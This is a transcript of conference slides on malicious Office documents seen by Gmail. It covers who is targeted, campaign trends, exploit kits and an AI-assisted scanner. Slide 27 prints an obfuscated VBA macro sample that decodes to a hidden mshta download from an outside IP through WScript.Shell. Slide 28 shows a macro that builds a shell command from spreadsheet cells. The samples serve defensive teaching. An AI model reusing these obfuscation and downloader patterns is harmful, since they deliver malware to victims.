HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a...
Transcript of HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a...
![Page 1: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/1.jpg)
SESSION ID:
Malicious Documents Trends: a Gmail Perspective
HTA-T10
Google, @eliewith the help of many Googlers
![Page 3: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/3.jpg)
https://www.anomali.com/files/white-papers/Anomali_Threat_Research-Gamaredon_TTPs_Target_Ukraine-WP.pdf
In Oct 2019 the Russian sponsored APT group Primitive Bear used obfuscated office documents to target Ukrainian entities
![Page 4: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/4.jpg)
Office: 56%
PDF: 2%
Malicious Documents represent a significant part of malware targeting our users
![Page 5: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/5.jpg)
Every week Gmail scan over 300B+ attachments for malware
![Page 6: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/6.jpg)
Each second we need to process millions of documents in a matter of milliseconds
![Page 7: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/7.jpg)
How Gmail malware detection works
Scanners Decision engine
Policy engine
![Page 8: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/8.jpg)
How Gmail malware detection works
Policy engine
Decision engine
Scanners
![Page 9: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/9.jpg)
How Gmail malware detection works
ScannersPolicy engine
Decision engine
![Page 10: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/10.jpg)
How Gmail malware detection works
ScannersPolicy engine
Decision engine
![Page 11: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/11.jpg)
How about users and organization at risk of targeted attack?
![Page 12: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/12.jpg)
Security Sandboxes are used to supplement detection when need.
![Page 13: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/13.jpg)
Agenda
Who is targeted by malicious documents?
Deconstructing malicious documents campaigns
Insights into Gmailnext-gen detection
![Page 14: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/14.jpg)
Who is targetedby malicious documents?
![Page 15: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/15.jpg)
Every type of organization is at risk of being targeted by malicious documents
Education Company Non for profit
Government
![Page 16: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/16.jpg)
Education
Company
Non for profit
Government
Some organizations are more targeted by malicious documents than others
![Page 17: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/17.jpg)
Education
Finance & Insurance
Health Care
IT
Wholesale Trade
Retail
Real Estate
Manufacturing
Utilities
Transportation
Some industries are more targeted by malicious documents than others
![Page 18: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/18.jpg)
Prevalence of malicious documents varies drastically from country to country
Indonesia
Russia
Germany
India
Japan
France
USA
Finland
Great Britain
Norway
![Page 19: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/19.jpg)
Deconstructing malicious documents campaigns
![Page 20: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/20.jpg)
2000 BCE 1200 CE 1800 CE 2020 CE
Cats through the ages
![Page 21: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/21.jpg)
63% of the malicious docs blocked by Gmail are different from day to day
![Page 22: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/22.jpg)
The volume of malicious document greatly varies from day to day: 3x variation is the normal
![Page 23: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/23.jpg)
Lockyransomware
Botnets are the culprits behind some of the massive bursts of malicious emails we observe. Necurs alone was
sending 100M locky samples per day in 2016
![Page 24: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/24.jpg)
The malicious document threat landscape is very fast-paced and extremely adversarial
![Page 25: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/25.jpg)
Kits offering weaponized document exploits packed with AV evasion techniques are routinely available on the blackmarket as SaaS for $400-$5000
https://news.sophos.com/en-us/2019/02/14/old-phantom-crypter-upends-malicious-document-tools/?cmp=30728
![Page 26: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/26.jpg)
What techniques do those kits use?
![Page 27: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/27.jpg)
boazuda = "zTpVrQQvHdVZWEzNCEvrDXMHhcjFYVxXIEEnuDCLMqpbjXqYf hcjFYVxXIEEnucjFYVxXIEEnup://104.144.207.201/cjFYVxXIEEnuron/WEzNCEvrDXMHcjFYVxXIEEnuiELOZqbRQzjYzTpVrQQvHdVZ.php?ucjFYVxXIEEnuzTpVrQQvHdVZDCLMqpbjXqYf=DCLMqpbjXqYfrniELOZqbRQzjY"boazuda = Replace(boazuda, "zTpVrQQvHdVZ", "m")boazuda = Replace(boazuda, "DCLMqpbjXqYf", "a")dzkkGwK = "X" & "p" & "o"boazuda = Replace(boazuda, "WEzNCEvrDXMH", "s")AuOKypAOxXWC = "u" & "x" & Trim("G")LrdizVw = 1418 + 1239 + 1546 + 521 + 1029iBEFgGzg = 1766 + 1267 + 544 + 1840boazuda = Replace(boazuda, "cjFYVxXIEEnu", "t")boazuda = Replace(boazuda, "iELOZqbRQzjY", "e")cYqOLzNGqSzN = 110 + 662 + 271 + 430 + 1818IzdiuFFLcOWX = 1234 - 1771 - 1644 - 1187boazuda = Replace(boazuda, "dfnAfNznHxFV", "l")yCdrQfLG = "Z" & "y" & Trim("R") & "d"
loquaz = "WScripUEAOXJSPZOCg.ShwBfuroncKuUbkjJbOBuEpdFEkjJbOBuEpdFE"loquaz = Replace(loquaz, "DgDdPEVxFMkH", "m")OFNCRKqKF = 1006 + 15 + 215loquaz = Replace(loquaz, "rTRMGUvpLYHv", "a")TOxTXxovMuOp = 734 + 33 + 1188 + 563 + 716loquaz = Replace(loquaz, "AdoqkZxrLcFX", "s")loquaz = Replace(loquaz, "UEAOXJSPZOCg", "t")QFMdIPpUYY = 459 - 943 - 977AUvwcPXcwXb = "E" & "Q"loquaz = Replace(loquaz, "wBfuroncKuUb", "e")iqEyuLuf = "D" & "A" & Trim("O")loquaz = Replace(loquaz, "kjJbOBuEpdFE", "l")uRxRWUfRpSX = Trim("G") & "k" & Trim("G") & Trim("I")
jXkIrzM = 128 - 1507 - 70XjnfDLLd = Trim("k") & "o" & "p"
CreateObject(loquaz).Run boazuda, 0
FAcDNuSZHuWp = 1892 - 994 - 435 - 958 - 491 - 1652 - 1245NbnCVgoojDpO = 1069 + 1656 + 957 + 714CDDQFoi = 512 + 1320zCwcBZPYSpI = 1011 - 1218 - 830 - 1495 - 300 - 1268 - 860
Mshta http://104.144.xxx.yyy/tron/stem.php
WScript.shell
![Page 28: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/28.jpg)
Attackers try to evade detection by adding malware in XLS cell content.
q = "": m = ""For i = use * 2 To use * 2 + 3
q = q + plumb(Cells(i, use * 2)): m = m + plumb(Cells(i + use / 2, use * 2))Next i
Shell q + cop(use, use) + m, ..
![Page 29: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/29.jpg)
63% of malware are different from day to day
Takeaways
Obfuscator and weaponized exploits are readily available
![Page 30: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/30.jpg)
Insights into Gmail next-gen malicious document detection
![Page 31: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/31.jpg)
Use AI to improve detection
![Page 32: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/32.jpg)
Really?
![Page 33: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/33.jpg)
Enhance existing detection capabilities with AI interpolation & advanced document analyzers to coverage and to adversarial attacks
![Page 34: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/34.jpg)
APT / 0day
Advanced obfuscation
Detection TCO
Bulkmalware
DefenseGAP /
opportunity
Gmail detection landscape: today
![Page 35: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/35.jpg)
APT / 0day
Advanced obfuscation
Detection TCO
Bulkmalware
AI
Gmail detection landscape: tomorrow
![Page 36: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/36.jpg)
How does it work in practice?
![Page 37: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/37.jpg)
FeatureextractorsDocument
analyzer
Machine LearningTranspiler SupervisedExecution
Feedback loop for dynamic code (eval)
Anatomy of a document scanner
Macro/scriptParsers
Macro ASTAnalyzer
![Page 38: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/38.jpg)
How our AI scanner integrate with Gmail malware detection works
ScannersPolicy engine
Decision engine
![Page 39: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/39.jpg)
Does it really work?
![Page 40: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/40.jpg)
AI scanner increases Office documents with malicious documents detection by ~10% consistently and 150+% at peak
AI only Both Other scanners only
Jan 28
Jan 29
Jan 30
Jan 31
Feb 1
Feb 2
Feb 3
Feb 4
Feb 5
Feb 6
Feb 7
Feb 8
Feb 9
Feb 10
Feb 11
Feb 12
Feb 13
Feb 14
Feb 15
Feb 16
Feb 17
Feb 18
Feb 19
Feb 20
Feb 21
Feb 22
Feb 23
Feb 24
200%
150%
100%
50%
0%
![Page 41: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/41.jpg)
Improvement varies by filetype
10.5% 14.5%
![Page 42: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/42.jpg)
How do you build ground truth?
![Page 43: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/43.jpg)
Hindsights samples re-evaluation
Re-scan documents at a later stage to give a chance to various scanners to have their false positives fixed
Additional sandbox scans
Scan suspicious and a large subset of documents with sandboxes for additional verdicts
Cluster analysisLeverage deep-clustering to quickly identify the samples that need to be reviewed to find potential FP / FN
No silver bullet: use a multi prong approach
![Page 44: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/44.jpg)
Deep-clustering to scale model improvements
Example of a incorrect extrapolation - .dll in code was considered malicious
![Page 45: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/45.jpg)
Malicious documents is a key threat to businesses and end users
Robust malicious documents detectionrequires a defense in depth strategy that combine detection approaches
Takeaways
Adversary continuously shift their TTP and tweak their payload to avoid detection
![Page 46: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/46.jpg)
Robust malicious documents detection requires combining technologies and constant R&D https://elie.net/rsa20
![Page 47: HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a significant ... obfuscation Detection TCO Bulk malware Defense GAP / opportunity Gmail](https://reader033.fdocuments.us/reader033/viewer/2022051900/5fef4ad9484ff20b38460551/html5/thumbnails/47.jpg)
Thank you